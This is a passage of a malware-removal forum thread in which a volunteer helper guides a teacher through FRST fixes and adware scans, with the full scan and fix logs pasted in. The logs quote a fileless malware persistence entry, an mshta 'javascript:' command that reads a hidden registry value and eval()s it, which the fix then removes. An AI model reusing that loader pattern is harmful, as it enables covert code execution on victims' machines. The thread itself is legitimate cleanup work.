2016-08-27 15:27 - 2013-01-15 21:57 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\NPE
2016-08-27 15:12 - 2016-07-03 14:34 - 00002060 _____ C:\Users\Public\Desktop\Norton 360.lnk
2016-08-27 15:12 - 2015-08-05 09:01 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2016-08-27 15:12 - 2015-03-04 11:37 - 00000000 ____D C:\Windows\system32\Drivers\N360x64
2016-08-27 11:50 - 2016-06-16 15:22 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\MigWiz
2016-08-27 10:08 - 2009-10-08 18:40 - 00000000 ____D C:\Program Files\Google
2016-08-27 10:08 - 2008-11-22 16:22 - 00000000 ____D C:\Program Files (x86)\Google
2016-08-26 15:29 - 2008-11-22 16:57 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\Google
2016-08-26 14:28 - 2011-02-19 10:11 - 00000000 ____D C:\Users\JHS-JJS\AppData\Roaming\Mozilla
2016-08-26 14:28 - 2008-11-22 16:22 - 00000000 ____D C:\ProgramData\Google
2016-08-26 14:26 - 2008-11-22 16:24 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-08-26 14:26 - 2008-09-22 10:16 - 00000000 ____D C:\ProgramData\Adobe
2016-08-26 13:56 - 2009-04-30 10:38 - 00000000 ____D C:\Users\JHS-JJS\.gimp-2.6
2016-08-24 16:15 - 2008-10-28 16:50 - 00000000 ____D C:\ProgramData\Viewpoint
2016-08-21 13:50 - 2008-10-29 16:44 - 00000680 _____ C:\Users\JHS-JJS\AppData\Local\d3d9caps.dat
2016-08-21 13:35 - 2016-07-30 10:36 - 00000000 ____D C:\NPE
2016-08-19 16:15 - 2009-06-01 13:12 - 00000000 ____D C:\Users\JHS-JJS\Desktop\DUCKIES
2016-08-14 11:50 - 2011-06-04 22:00 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\CrashDumps
2016-08-12 16:50 - 2006-11-02 08:33 - 88866816 _____ C:\Windows\system32\config\software_previous
2016-08-12 16:49 - 2016-07-02 10:39 - 00000000 ____D C:\Users\JHS-JJS\AppData\Local\b263cb
2016-08-12 16:49 - 2015-03-04 11:39 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2016-08-12 16:49 - 2008-09-22 10:14 - 00000000 ____D C:\Program Files (x86)\Digital Line Detect
2016-08-12 16:49 - 2006-11-02 09:34 - 00000000 ____D C:\Windows\system32\spool
2016-08-12 16:49 - 2006-11-02 09:34 - 00000000 ____D C:\Windows\system32\Msdtc
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 __RSD C:\Windows\Media
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\rescache
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\registration
2016-08-12 16:49 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-08-12 16:43 - 2006-11-02 08:33 - 23855104 _____ C:\Windows\system32\config\system_previous
2016-08-12 16:33 - 2006-11-02 08:33 - 82051072 _____ C:\Windows\system32\config\components_previous
2016-08-12 16:33 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\sam_previous
2016-08-12 15:19 - 2016-07-05 11:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-08-12 13:27 - 2016-07-05 11:48 - 00000850 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-08-12 12:52 - 2008-10-28 14:35 - 00000000 ____D C:\Users\JHS-JJS
2016-08-12 12:31 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\security_previous
2016-08-12 12:31 - 2006-11-02 08:33 - 00262144 _____ C:\Windows\system32\config\default_previous
2016-08-12 12:28 - 2012-07-25 10:45 - 00000000 ____D C:\Program Files (x86)\Yahoo!
2016-08-12 12:28 - 2009-01-29 00:41 - 00000000 ____D C:\Program Files (x86)\MySpace
2016-08-12 12:28 - 2008-09-22 10:09 - 00000000 ____D C:\Program Files (x86)\Java
2016-08-11 16:52 - 2016-06-28 11:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox(69)
2016-08-09 12:39 - 2010-03-20 15:01 - 00000000 ____D C:\ProgramData\Norton
2016-08-07 12:29 - 2010-12-29 11:54 - 00000000 ____D C:\Users\JHS-JJS\Desktop\New Folder
2016-08-05 16:04 - 2016-07-05 11:48 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service(70)
2016-08-02 11:34 - 2006-11-02 11:21 - 00375264 _____ C:\Windows\system32\FNTCACHE.DAT
2016-08-02 10:56 - 2013-08-14 19:47 - 00000000 ____D C:\Windows\system32\MRT
2016-08-02 10:47 - 2006-11-02 08:35 - 144749672 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe

==================== Files in the root of some directories =======

2009-11-10 11:23 - 2009-11-10 11:23 - 0024226 _____ () C:\Users\JHS-JJS\AppData\Roaming\UserTile.png
2008-10-28 20:33 - 2016-07-16 10:23 - 0002276 _____ () C:\Users\JHS-JJS\AppData\Roaming\wklnhst.dat
2008-10-29 16:44 - 2016-08-21 13:50 - 0000680 _____ () C:\Users\JHS-JJS\AppData\Local\d3d9caps.dat
2008-10-31 09:35 - 2015-04-30 12:14 - 0015360 _____ () C:\Users\JHS-JJS\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-01-30 15:51 - 2013-01-30 15:51 - 0301806 _____ () C:\Users\JHS-JJS\AppData\Local\dd_ReportViewerMSI7E90.txt
2013-01-30 15:51 - 2013-01-30 15:51 - 0010978 _____ () C:\Users\JHS-JJS\AppData\Local\dd_ReportViewerUI7E90.txt
2014-04-26 17:10 - 2014-04-26 17:11 - 0442244 _____ () C:\Users\JHS-JJS\AppData\Local\dd_vcredistMSI6163.txt
2014-04-26 17:10 - 2014-04-26 17:11 - 0012204 _____ () C:\Users\JHS-JJS\AppData\Local\dd_vcredistUI6163.txt
2008-11-09 18:00 - 2009-10-14 15:53 - 0008248 _____ () C:\Users\JHS-JJS\AppData\Local\en.ini
2011-05-18 19:16 - 2011-06-03 07:28 - 0001940 _____ () C:\Users\JHS-JJS\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini
2016-05-11 14:26 - 2016-05-11 14:26 - 0004908 _____ () C:\ProgramData\lbogtyso.zat
2016-05-11 14:26 - 2016-05-11 14:26 - 0000016 _____ () C:\ProgramData\mntemp

Files to move or delete:
====================
C:\Users\JHS-JJS\epson12578.exe
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe
C:\Users\JHS-JJS\Install_AIM.exe
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-08-30 10:47

==================== End of FRST.txt ============================


  • 0

#5
zep516

    Trusted Helper

  • Malware Removal
  • 6,811 posts
Hello,

Please uninstall these programs. If they don't uninstall, skip them and continue with the instructions.
Download Updater
File Opener Pro


Next

Download the enclosed attached file fixlist.txt. Save it in the location where FRST64 is (your Desktop). Run FRST and click on the Fix button. Wait until finished.

The tool will make a log called Fixlog.txt in the location where FRST is (your Desktop). Please post it in your reply.
  • 0

#6
[email protected]

    Member

  • Topic Starter
  • Member
  • 18 posts

Hello zep516, thanks for the quick response. I'm a school teacher and I have classes today, so I will not be able to follow your instructions until later today (sometime after 6pm Eastern).


  • 0

#7
zep516

    Trusted Helper

  • Malware Removal
  • 6,811 posts
Then it's recess time. See you after 6 then.

Thanks
Joe :)
  • 0

#8
[email protected]

    Member

  • Topic Starter
  • Member
  • 18 posts

Here is Fixlog.txt. LOL at recess, I teach high school kids, it's my second year, some students are older than I am.

 

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 29-08-2016
Ran by JHS-JJS (30-08-2016 16:19:45) Run:1
Running from C:\Users\JHS-JJS\Desktop
Loaded Profiles: JHS-JJS (Available Profiles: JHS-JJS)
Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.23.9\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.30.3\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.5\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}\localserver32 -> C:\Users\JHS-JJS\AppData\Roaming\Google\Google Talk\googletalk.exe (Google)
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.29.1\psuser_64.dll => No File
CustomCLSID: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}\InprocServer32 -> C:\Users\JHS-JJS\AppData\Local\Google\Update\1.3.28.15\psuser_64.dll => No File
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MpfService => ""="Service"
HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\shell32.dll,-153 <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36: "C:\Windows\system32\mshta.exe" "javascript:JuJWx1="H";J1I8=new ActiveXObject("WScript.Shell");O9xZdAbO="msF";D8dwB=J1I8.RegRead("HKCU\\software\\tipm\\igbespedi");Nzqpd2a="y2v1QG";eval(D8dwB);PFf8KK2H="ovZ";" <===== ATTENTION
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Run: [**njop<*>] => "C:\Users\JHS-JJS\AppData\Local\b263cb\84e7ae.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {5c7703ed-05b0-11de-9b6c-00038a000015} - M:\LaunchU3.exe
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\MountPoints2: {8817984c-e0b8-11e2-928d-00038a000015} - L:\VZW_Software_upgrade_assistant_installer.exe
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.msn.com/?ocid=EIE9HP&PC=UP50
SearchScopes: HKLM-x32 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKLM-x32 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKLM-x32 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
SearchScopes: HKU\.DEFAULT -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-19 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-20 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {40D41A8B-D79B-43D7-99A7-9EE0F344C385} -  No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
CHR Extension: (Wajam) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-11-15] [UpdateUrl: hxxp://www.wajam.com/update/Chrome/chrome_addon_updates.xml] <==== ATTENTION
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
C:\Users\JHS-JJS\epson12578.exe
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe
C:\Users\JHS-JJS\Install_AIM.exe
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe
CMD: bitsadmin /reset /allusers
CMD: netsh winsock reset catalog
CMD: ipconfig /flushdns
RemoveProxy:
hosts:
Emptytemp:
*****************

Processes closed successfully.
Restore point was successfully created.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{0507EEDE-3AE7-49c7-BF37-0EB4A62D8638}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{33b07fd4-5917-43e1-968d-4c79231836bf}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{355EC88A-02E2-4547-9DEE-F87426484BD1}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{590C4387-5EBD-4D46-8A84-CD0BA2EF2856}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{793EE463-1304-471C-ADF1-68C2FFB01247}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{A8F086C3-2497-4229-82FE-586F2D326F95}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{CC182BE1-84CE-4A57-B85C-FD4BBDF78CB2}" => key removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000_Classes\CLSID\{D1EDC4F5-7F4D-4B12-906A-614ECF66DDAF}" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\MCODS" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\mcmscsvc" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\MCODS" => key removed successfully
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\MpfService" => key removed successfully
HKLM\Software\Classes\cmdfile\DefaultIcon\\Default => value restored successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Classes\46bb36" => key removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**njop<*> => value removed successfully
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{5c7703ed-05b0-11de-9b6c-00038a000015}" => key removed successfully
HKCR\CLSID\{5c7703ed-05b0-11de-9b6c-00038a000015} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{8817984c-e0b8-11e2-928d-00038a000015}" => key removed successfully
HKCR\CLSID\{8817984c-e0b8-11e2-928d-00038a000015} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\GDriveSharedOverlay" => key removed successfully
HKCR\CLSID\{81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{443789B7-F39C-4b5c-9287-DA72D38F4FE6}" => key removed successfully
HKCR\Wow6432Node\CLSID\{443789B7-F39C-4b5c-9287-DA72D38F4FE6} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\Wow6432Node\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D943EABA-8E9F-40BE-861D-26636C0303F1}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D943EABA-8E9F-40BE-861D-26636C0303F1} => key not found.
"HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{443789B7-F39C-4b5c-9287-DA72D38F4FE6}" => key removed successfully
HKCR\CLSID\{443789B7-F39C-4b5c-9287-DA72D38F4FE6} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
"HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => key removed successfully
HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}" => key removed successfully
HKCR\Wow6432Node\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => value removed successfully
HKCR\CLSID\{2318C2B1-4965-11D4-9B18-009027A5CD4F} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{40D41A8B-D79B-43D7-99A7-9EE0F344C385} => value removed successfully
HKCR\CLSID\{40D41A8B-D79B-43D7-99A7-9EE0F344C385} => key not found.
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => value removed successfully
HKCR\CLSID\{21FA44EF-376D-4D53-9B0F-8A89D3229068} => key not found.
C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp <==== ATTENTION => not found
IpInIp => service removed successfully
C:\Users\JHS-JJS\epson12578.exe => moved successfully
C:\Users\JHS-JJS\garmin_rmu_cnnant2010_20.exe => moved successfully
C:\Users\JHS-JJS\gimp-2.6.6-i686-setup.exe => moved successfully
C:\Users\JHS-JJS\Install_AIM.exe => moved successfully
C:\Users\JHS-JJS\MorphVOXPro4_Install-1.exe => moved successfully

========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0 [ 7.0.6001 ]
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

Unable to cancel {8CB8F554-37FB-4672-AA42-62E0E271AAEC}.
0 out of 1 jobs canceled.

========= End of CMD: =========


========= netsh winsock reset catalog =========


Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 917979200 B
Java, Flash, Steam htmlcache => 506 B
Windows/system/drivers => 284065193 B
Edge => 0 B
Chrome => 13451254 B
Firefox => 28315944 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 66228 B
Public => 0 B
ProgramData => 0 B
systemprofile => 66228 B
systemprofile32 => 24036278 B
LocalService => 132244 B
LocalService => 0 B
NetworkService => 588432 B
NetworkService => 0 B
JHS-JJS => 43605029 B

RecycleBin => 2695360368 B
EmptyTemp: => 3.7 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 16:25:18 ====


  • 0

#9
zep516

    Trusted Helper

  • Malware Removal
  • 6,811 posts
Well done.

We need to run 3 scans for adware and post the log reports from AdwCleaner, Junkware Removal Tool and Malwarebytes.

To do that:

Next

Please download AdwCleaner by Xplode onto your Desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click the Scan button and wait for the process to complete.
  • Click the logfile button and the log will open in Notepad.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file with your next answer.
  • The report will be saved in the C:\AdwCleaner folder.

Next

Please download Junkware Removal Tool to your Desktop.
  • Please close your security software to avoid potential conflicts. See here for how to disable your security protection (antivirus).
  • Run the tool by double-clicking it. If you are using Windows Vista or 7, right-click it and select Run as administrator.
  • The tool will open and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.
  • Please post the contents of JRT.txt into your reply.

Next

  • Please download Malwarebytes Anti-Malware to your desktop.
  • Double-click mbam-setup-version.exe and follow the prompts to install the program.
  • Launch Malwarebytes Anti-Malware.
  • Then click Finish.
  • If an update is found, you will be prompted to download and install the latest version.
  • On the Settings tab > Detection and Protection subtab, Detection Options, tick the box 'Scan for rootkits'.
  • Once the program has loaded, select Scan now. Or select the Threat Scan from the Scan menu.
  • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
  • Reboot your computer if prompted.

Posting the Malwarebytes log:

  • After the restart, once you are back at your desktop, open MBAM once more.
  • Click on the History tab > Application Logs.
  • Double click on the Scan Log which shows the date and time of the scan just performed.
  • Click 'Export'.
  • Click 'Text file (*.txt)'.
  • In the Save File dialog box which appears, click on Desktop.
  • In the File name: box, type a name for your scan log.
  • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
  • Click Ok.
  • Post that saved log to your next reply.

In your next reply, post:
  • The AdwCleaner [C1].txt log
  • The JRT.txt log
  • The Malwarebytes log



  • 0

#10
[email protected]

    Member

  • Topic Starter
  • Member
  • 18 posts

First log, downloading junkware next,

 

# AdwCleaner v6.010 - Logfile created 31/08/2016 at 12:20:42
# Updated on 12/08/2016 by ToolsLib
# Database : 2016-08-30.2 [Server]
# Operating System : Windows ™ Vista Home Premium Service Pack 2 (X64)
# Username : JHS-JJS - JHS-JJS-DELL8MG
# Running from : C:\Users\JHS-JJS\Desktop\NEW PROGRAMS\adwcleaner_6.010.exe
# Mode: Scan
# Support : https://toolslib.net/forum



***** [ Services ] *****

No malicious services found.


***** [ Folders ] *****

Folder Found:  C:\Users\JHS-JJS\AppData\Local\AOL Toolbar
Folder Found:  C:\Users\JHS-JJS\AppData\Local\Wajam
Folder Found:  C:\Users\JHS-JJS\AppData\Local\WeatherAlerts
Folder Found:  C:\Users\JHS-JJS\AppData\LocalLow\Yahoo!\Companion
Folder Found:  C:\Users\JHS-JJS\AppData\Roaming\download Manager
Folder Found:  C:\Program Files\AOL Toolbar
Folder Found:  C:\Users\JHS-JJS\AppData\Local\VirtualStore\Program Files (x86)\Yahoo!\Companion
Folder Found:  C:\ProgramData\AOL Toolbar
Folder Found:  C:\ProgramData\Viewpoint
Folder Found:  C:\ProgramData\w3i
Folder Found:  C:\ProgramData\Application Data\AOL Toolbar
Folder Found:  C:\ProgramData\Application Data\Viewpoint
Folder Found:  C:\ProgramData\Application Data\w3i
Folder Found:  C:\Program Files (x86)\AOL Toolbar
Folder Found:  C:\Program Files (x86)\w3i
Folder Found:  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Yahoo! Companion
Folder Found:  C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Yahoo!\Companion
Folder Found:  C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp


***** [ Files ] *****

File Found:  C:\Windows\Downloaded Program Files\popcaploader.inf


***** [ DLL ] *****

No malicious DLLs found.


***** [ WMI ] *****

No malicious keys found.


***** [ Shortcuts ] *****

No infected shortcut found.


***** [ Scheduled Tasks ] *****

No malicious task found.


***** [ Registry ] *****

Key Found:  HKLM\SOFTWARE\Classes\CrossriderApp0005058.BHO
Key Found:  HKLM\SOFTWARE\Classes\CrossriderApp0005058.BHO.1
Key Found:  HKLM\SOFTWARE\Classes\CrossriderApp0005058.Sandbox
Key Found:  HKLM\SOFTWARE\Classes\CrossriderApp0005058.Sandbox.1
